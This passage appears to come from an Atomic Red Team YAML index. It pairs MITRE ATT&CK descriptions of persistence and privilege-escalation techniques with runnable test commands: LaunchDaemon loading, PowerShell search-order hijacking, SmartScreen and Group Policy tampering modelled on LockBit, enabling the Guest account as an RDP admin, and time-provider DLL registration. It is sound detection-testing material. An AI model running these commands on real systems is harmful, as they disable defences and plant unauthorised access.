Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as usr/local/bin to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.3'
identifier: T1543.004
atomic_tests:
- name: Launch Daemon
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: 'Utilize LaunchDaemon to launch `Hello World`
'
supported_platforms:
- macos
input_arguments:
plist_filename:
description: filename
type: string
default: com.atomicredteam.plist
path_malicious_plist:
description: Name of file to store in cron folder
type: string
default: "$PathToAtomicsFolder/T1543.004/src/atomicredteam_T1543_004.plist"
dependency_executor_name: bash
dependencies:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
'
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
'
executor:
name: bash
elevation_required: true
command: |
sudo cp #{path_malicious_plist} /Library/LaunchDaemons/#{plist_filename}
sudo launchctl load -w /Library/LaunchDaemons/#{plist_filename}
cleanup_command: |
sudo launchctl unload /Library/LaunchDaemons/#{plist_filename}
sudo rm /Library/LaunchDaemons/#{plist_filename}
sudo rm /tmp/T1543_004_atomicredteam.txt
T1574.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
- source_name: Microsoft Environment Property
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
description: Microsoft. (n.d.). CreateProcess function. Retrieved September
12, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft WinExec
description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
2024.
url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:49.665Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL](https://attack.mitre.org/techniques/T1574/001).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Stefan Kanthak
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1574.008
atomic_tests:
- name: powerShell Persistence via hijacking default modules - Get-Variable.exe
auto_generated_guid: 1561de08-0b4b-498e-8261-e922f3494aae
description: "Colibri leverages PowerShell in a unique way to maintain persistence
after a reboot. Depending on the Windows version, Colibri drops its copy in
%APPDATA%\\Local\\Microsoft\\WindowsApps and \nnames it Get-Variable.exe for
Windows 10 and above.\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\n"
supported_platforms:
- windows
executor:
command: |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:"$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" "PathToAtomicsFolder\T1574.008\bin\calc.cs"
Powershell -noprofile
cleanup_command: |
Remove-Item "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" -ErrorAction Ignore
Stop-Process -Name "calculator"
name: powershell
T1484.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163
created: '2020-12-28T21:50:59.844Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/001
external_id: T1484.001
- source_name: Mandiant M Trends 2016
description: Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved
November 17, 2024.
url: https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
- source_name: ADSecurity GPO Persistence 2016
description: 'Metcalf, S. (2016, March 14). Sneaky Active Directory Persistence
#17: Group Policy. Retrieved March 5, 2019.'
url: https://adsecurity.org/?p=2716
- source_name: Microsoft Hacking Team Breach
description: 'Microsoft Secure Team. (2016, June 1). Hacking Team Breach:
A Cyber Jurassic Park. Retrieved March 5, 2019.'
url: https://www.microsoft.com/security/blog/2016/06/01/hacking-team-breach-a-cyber-jurassic-park/
- source_name: Wald0 Guide to GPOs
description: Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and
OUs. Retrieved March 5, 2019.
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
September 23, 2024.
url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
2019.'
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:50.475Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
intention of escalating privileges on the domain. Group policy allows for
centralized management of user and computer settings in Active Directory (AD).
GPOs are containers for group policy settings made up of files stored within
a predictable network path `\\\\SYSVOL\\\\Policies\\`.(Citation:
TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike
other objects in AD, GPOs have access controls associated with them. By default
all user accounts in the domain have permission to read GPOs. It is possible
to delegate GPO access control permissions, e.g. write access, to specific
users or groups in the domain.\n\nMalicious GPO modifications can be used
to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053),
[Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001),
[Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create
Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),
\ and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide
to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends
2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many
user and machine settings in the AD environment, there are a great number
of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide
to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask
can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)
by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation:
Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases
an adversary might modify specific user rights like SeEnableDelegationPrivilege,
set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf,
to achieve a subtle AD backdoor with complete control of the domain because
the user account under the adversary's control would then be able to modify
GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Itamar Mizrahi, Cymptom
- Tristan Bennett, Seamless Intelligence
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1484.001
atomic_tests:
- name: LockBit Black - Modify Group policy settings -cmd
auto_generated_guid: 9ab80952-74ee-43da-a98c-1e740a985f28
description: 'An adversary can modify the group policy settings.
'
supported_platforms:
- windows
executor:
command: |
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f
cleanup_command: |
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /f >nul 2>&1
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /f >nul 2>&1
name: command_prompt
elevation_required: true
- name: LockBit Black - Modify Group policy settings -Powershell
auto_generated_guid: b51eae65-5441-4789-b8e8-64783c26c1d1
description: 'An adversary modifies group policy settings
'
supported_platforms:
- windows
executor:
command: |
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffsetDC -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTime -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name GroupPolicyRefreshTimeOffset -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name EnableSmartScreen -PropertyType DWord -Value 0 -Force
New-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\System" -Name ShellSmartScreenLevel -Force
cleanup_command: "Remove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name GroupPolicyRefreshTimeDC -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name GroupPolicyRefreshTimeOffsetDC
-Force -ErrorAction Ignore \nRemove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name GroupPolicyRefreshTime -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name GroupPolicyRefreshTimeOffset
-Force -ErrorAction Ignore\nRemove-ItemProperty \"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\"
-Name EnableSmartScreen -Force -ErrorAction Ignore\nRemove-ItemProperty
\"HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\" -Name ShellSmartScreenLevel
-Force -ErrorAction Ignore\n"
name: powershell
elevation_required: true
T1078.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d
created: '2020-03-13T20:15:31.974Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1078/001
external_id: T1078.001
- source_name: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023
description: Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown.
(2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to
Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved
March 26, 2025.
url: https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/
- source_name: AWS Root User
description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021.
url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html
- source_name: Microsoft Local Accounts Feb 2019
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
11, 2019.
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
- source_name: Metasploit SSH Module
description: undefined. (n.d.). Retrieved April 12, 2019.
url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh
- source_name: Threat Matrix for Kubernetes
description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved
March 30, 2021.
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
- source_name: Pentera vCenter Information Disclosure
description: Yuval Lazar. (2022, March 29). Mitigating VMware vCenter Information
Disclosure. Retrieved March 26, 2025.
url: https://pentera.io/blog/information-disclosure-in-vmware-vcenter/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:51.181Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
Default accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module)
Default accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212) on the vCenter host), they will then have access to the ESXi server.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023)(Citation: Pentera vCenter Information Disclosure)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Janantha Marasinghe
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- SaaS
- IaaS
- Linux
- macOS
- Containers
- Network Devices
- Office Suite
- Identity Provider
- ESXi
x_mitre_version: '1.5'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
description: |
After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
and desktop will allow multiple RDP connections.
supported_platforms:
- windows
input_arguments:
guest_user:
description: Specify the guest account
type: string
default: guest
guest_password:
description: Specify the guest password
type: string
default: Password123!
local_admin_group:
description: Specify the admin localgroup name
type: string
default: Administrators
remote_desktop_users_group_name:
description: Specify the remote desktop users group name
type: string
default: Remote Desktop Users
remove_rdp_access_during_cleanup:
description: Set to 1 if you want the cleanup to remove RDP access to machine
type: integer
default: 0
executor:
command: |-
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
cleanup_command: |-
net user #{guest_user} /active:no >nul 2>&1
net localgroup #{local_admin_group} #{guest_user} /delete >nul 2>&1
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /delete >nul 2>&1
if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
name: command_prompt
elevation_required: true
- name: Activate Guest Account
auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
'
supported_platforms:
- windows
input_arguments:
guest_user:
description: Specify the guest account
type: string
default: guest
executor:
command: 'net user #{guest_user} /active:yes
'
cleanup_command: 'net user #{guest_user} /active:no
'
name: command_prompt
elevation_required: true
- name: Enable Guest Account on macOS
auto_generated_guid: 0315bdff-4178-47e9-81e4-f31a6d23f7e4
description: This test enables the guest account on macOS using sysadminctl
utility.
supported_platforms:
- macos
executor:
command: sudo sysadminctl -guestAccount on
cleanup_command: sudo sysadminctl -guestAccount off
name: sh
elevation_required: true
T1547.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc
created: '2020-01-24T15:51:52.317Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/003
external_id: T1547.003
- source_name: Github W32Time Oct 2017
description: Lundgren, S. (2017, October 28). w32time. Retrieved March 26,
2018.
url: https://github.com/scottlundgren/w32time
- source_name: Microsoft W32Time May 2017
description: Mathers, B. (2017, May 31). Windows Time Service Tools and Settings.
Retrieved March 26, 2018.
url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings
- source_name: Microsoft W32Time Feb 2018
description: Microsoft. (2018, February 1). Windows Time Service (W32Time).
Retrieved March 26, 2018.
url: https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
url: https://technet.microsoft.com/en-us/sysinternals/bb963902
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:51.278Z'
name: Time Providers
description: |-
Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Scott Lundgren, @5twenty9, Carbon Black
- Harun Küßner
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
identifier: T1547.003
atomic_tests:
- name: Create a new time provider
auto_generated_guid: df1efab7-bc6d-4b88-8be9-91f55ae017aa
description: |
Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
in C:\Users\Public\ as validation that the test is successful.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
supported_platforms:
- windows
executor:
command: |
net stop w32time
Copy-Item "$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll" C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time
cleanup_command: |
net stop w32time
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
rm -force C:\Users\Public\AtomicTest.dll
net start w32time
name: powershell
elevation_required: true
- name: Edit an existing time provider
auto_generated_guid: 29e0afca-8d1d-471a-8d34-25512fc48315
description: |
Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
in C:\Users\Public\ as validation that the test is successful.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
supported_platforms:
- windows
executor:
command: |
net stop w32time
Copy-Item "$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll" C:\Users\Public\AtomicTest.dll
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
net start w32time
cleanup_command: |
net stop w32time
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
rm -force C:\Users\Public\AtomicTest.dll
net start w32time
name: powershell
elevation_required: true
T1546.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--63220765-d418-44de-8fae-694b3912317d
created: '2020-01-24T14:17:43.906Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1546/005
external_id: T1546.005
- source_name: Trap Manual
description: ss64. (n.d.). trap. Retrieved May 21, 2019.
url: https://ss64.com/bash/trap.html
- source_name: Cyberciti Trap Statements
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
url: https://bash.cyberciti.biz/guide/Trap_statement
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:51.725Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.
Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
- Linux
x_mitre_version: '1.1'
identifier: T1546.005
atomic_tests:
- name: Trap EXIT
auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61
description: |
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- macos
- linux
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
- name: Trap EXIT (freebsd)
auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f
description: |
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
'
prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y bash)\n"
executor:
command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh"
EXIT''
'
cleanup_command: 'rm -f /tmp/art-fish.txt
'
name: sh
- name: Trap SIGINT
auto_generated_guid: a547d1ba-1d7a-4cc5-a9cb-8d65e8809636
description: |
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- macos
- linux
executor:
